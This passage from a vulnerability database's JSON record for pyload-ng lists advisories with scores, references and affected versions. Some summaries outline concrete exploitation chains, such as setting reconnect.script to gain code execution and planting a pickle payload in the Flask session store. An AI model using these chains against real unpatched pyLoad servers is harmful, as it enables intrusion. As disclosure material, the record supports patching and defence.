packages/pkg:pypi/pyload-ng@0.5.0b3.dev98"}],"aliases":["CVE-2026-40594","GHSA-mp82-fmj6-f22v","PYSEC-2026-125"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rynb-u84j-7khx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61902?format=json","vulnerability_id":"VCID-ucfj-9bwk-pbd8","summary":"pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-24808","reference_id":"","reference_type":"","scores":[{"value":"0.02357","scoring_system":"epss","scoring_elements":"0.85263","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-24808"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-24808","reference_id":"CVE-2024-24808","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-24808"},{"reference_url":"https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd","reference_id":"fe94451dcc2be90b3889e2fd9d07b483c8a6dccd","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/"}],"url":"https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd"},{"reference_url":"https://github.com/advisories/GHSA-g3cm-qg2v-2hj5","reference_id":"GHSA-g3cm-qg2v-2hj5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g3cm-qg2v-2hj5"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5","reference_id":"GHSA-g3cm-qg2v-2hj5","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28763?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev79","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev79"}],"aliases":["CVE-2024-24808","GHSA-g3cm-qg2v-2hj5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ucfj-9bwk-pbd8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67864?format=json","vulnerability_id":"VCID-uwgh-ppsz-jyhz","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, pyload-ng WebUI returns full Python traceback details to clients on unhandled exceptions. Because /web/<path:filename> is reachable without authentication and renders attacker-controlled template names, an unauthenticated user can reliably trigger a server exception (for example by requesting a non-existent template) and receive internal stack traces in the HTTP response. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44226","reference_id":"","reference_type":"","scores":[{"value":"0.00067","scoring_system":"epss","scoring_elements":"0.20838","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44226"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44226","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44226"},{"reference_url":"https://github.com/advisories/GHSA-c3gc-9pf2-84gg","reference_id":"GHSA-c3gc-9pf2-84gg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c3gc-9pf2-84gg"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg","reference_id":"GHSA-c3gc-9pf2-84gg","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:26:38Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-44226","GHSA-c3gc-9pf2-84gg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uwgh-ppsz-jyhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/77995?format=json","vulnerability_id":"VCID-vfr2-7map-4bcp","summary":"pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has been patched in version 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33509","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29541","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33509"},{"reference_url":"https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"GHSA-r7mc-x6x7-cqxx","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-26T19:33:56Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"}],"fixed_packages":[],"aliases":["CVE-2026-33509","GHSA-r7mc-x6x7-cqxx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vfr2-7map-4bcp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71687?format=json","vulnerability_id":"VCID-wtub-vtcd-6uhc","summary":"pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, pyLoad has a server-side request forgery (SSRF) vulnerability. The fix for CVE-2026-33992 added IP validation to BaseDownloader.download() that checks the hostname of the initial download URL. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter. An authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35459","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13369","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35459"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35459","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35459"},{"reference_url":"https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443","reference_id":"33c55da084320430edfd941b60e3da0eb1be9443","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/"}],"url":"https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443"},{"reference_url":"https://github.com/advisories/GHSA-7gvf-3w72-p2pg","reference_id":"GHSA-7gvf-3w72-p2pg","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7gvf-3w72-p2pg"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg","reference_id":"GHSA-7gvf-3w72-p2pg","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg"}],"fixed_packages":[],"aliases":["CVE-2026-35459","GHSA-7gvf-3w72-p2pg"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wtub-vtcd-6uhc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360742?format=json","vulnerability_id":"VCID-x9sy-hcqs-pke5","summary":"Duplicate Advisory: GHSA-x698-5hjm-w2m5\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-x698-5hjm-w2m5. This link is maintained to preserve external references.\n\n### Original Description\nAny unauthenticated attacker can bypass the localhost \nrestrictions posed by the application and utilize this to create \narbitrary packages","references":[{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-7346","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-7346"},{"reference_url":"https://github.com/advisories/GHSA-2wcm-vx67-3x4q","reference_id":"GHSA-2wcm-vx67-3x4q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2wcm-vx67-3x4q"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5","reference_id":"GHSA-x698-5hjm-w2m5","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28454?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev78","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78"}],"aliases":["GHSA-2wcm-vx67-3x4q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x9sy-hcqs-pke5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48780?format=json","vulnerability_id":"VCID-xkag-9scb-bfhk","summary":"pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21645","reference_id":"","reference_type":"","scores":[{"value":"0.69097","scoring_system":"epss","scoring_elements":"0.98657","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21645"},{"reference_url":"https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d","reference_id":"4159a1191ec4fe6d927e57a9c4bb8f54e16c381d","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/"}],"url":"https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21645","reference_id":"CVE-2024-21645","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21645"},{"reference_url":"https://github.com/advisories/GHSA-ghmw-rwh8-6qmr","reference_id":"GHSA-ghmw-rwh8-6qmr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ghmw-rwh8-6qmr"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr","reference_id":"GHSA-ghmw-rwh8-6qmr","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28288?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev77","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77"}],"aliases":["CVE-2024-21645","GHSA-ghmw-rwh8-6qmr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xkag-9scb-bfhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71594?format=json","vulnerability_id":"VCID-xmf5-aqjt-tfhp","summary":"pyLoad is a free and open-source download manager written in Python. The fix for CVE-2026-33509 added an ADMIN_ONLY_OPTIONS set to block non-admin users from modifying security-critical config options. The storage_folder option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie. This vulnerability is fixed with commit c4cf995a2803bdbe388addfc2b0f323277efc0e1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35464","reference_id":"","reference_type":"","scores":[{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22848","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35464"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35464","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35464"},{"reference_url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_id":"c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2026-33509","reference_id":"CVERecord?id=CVE-2026-33509","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2026-33509"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j","reference_id":"GHSA-4744-96p5-mp2j","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"GHSA-r7mc-x6x7-cqxx","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"}],"fixed_packages":[],"aliases":["CVE-2026-35464","GHSA-4744-96p5-mp2j"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xmf5-aqjt-tfhp"}],"fixing_vulnerabilities":[],"risk_score":"10.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b1.dev4"}